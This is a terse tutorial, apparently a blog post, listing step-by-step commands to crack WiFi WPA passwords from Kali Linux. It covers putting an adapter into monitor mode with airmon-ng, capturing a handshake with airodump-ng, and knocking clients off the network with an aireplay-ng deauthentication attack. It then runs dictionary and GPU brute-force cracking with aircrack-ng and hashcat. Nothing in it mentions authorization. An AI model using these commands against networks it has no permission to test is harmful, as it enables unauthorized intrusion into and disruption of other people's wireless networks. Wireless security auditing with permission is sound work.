Environment of System
- Operating System: Kali Linux 2021.3
- WiFi Adapters: ALFA AWUS036ACS
- Hardware: MacBook Pro 15
Install dirve
ALFA AWUS036ACS dirve
1
|
sudo apt install realtek-rtl88xxau-dkms
|
Step1
check wifi adapters, must find wlan0
Step2
Start up wifi adapter monitor mode
Open wifi adapter monitor mode
1
|
sudo airmon-ng start wlan0
|
Stop wifi adapter monitor mode
1
|
sudo airmon-ng stop wlan0
|
Step3
Scanning wifi
Step4
Get handshake package
1
|
sudo airodump-ng --bssid BSSID -c CH -w Save_packet_path wlan0
|
Step5(non-essential)
This step is based on the premise that the handshake package cannot be obtained
1
|
sudo airepaly-ng -0 0 -a BSSID -c STATION wlan0
|
Step6 Rrn crack password
Use CPU
Rrn crack password
1
|
sudo aircrack-ng -w dictionary.txt Save_packet_path
|
Use GPU
Fist change cap file to hccapx
1
|
sudo aircrack-ng ./*.cap -j save_path/name.hccapx
|
Second run brute force
1
|
hashcat -m 2500 ./name.hccapx ./dictionary.txt
|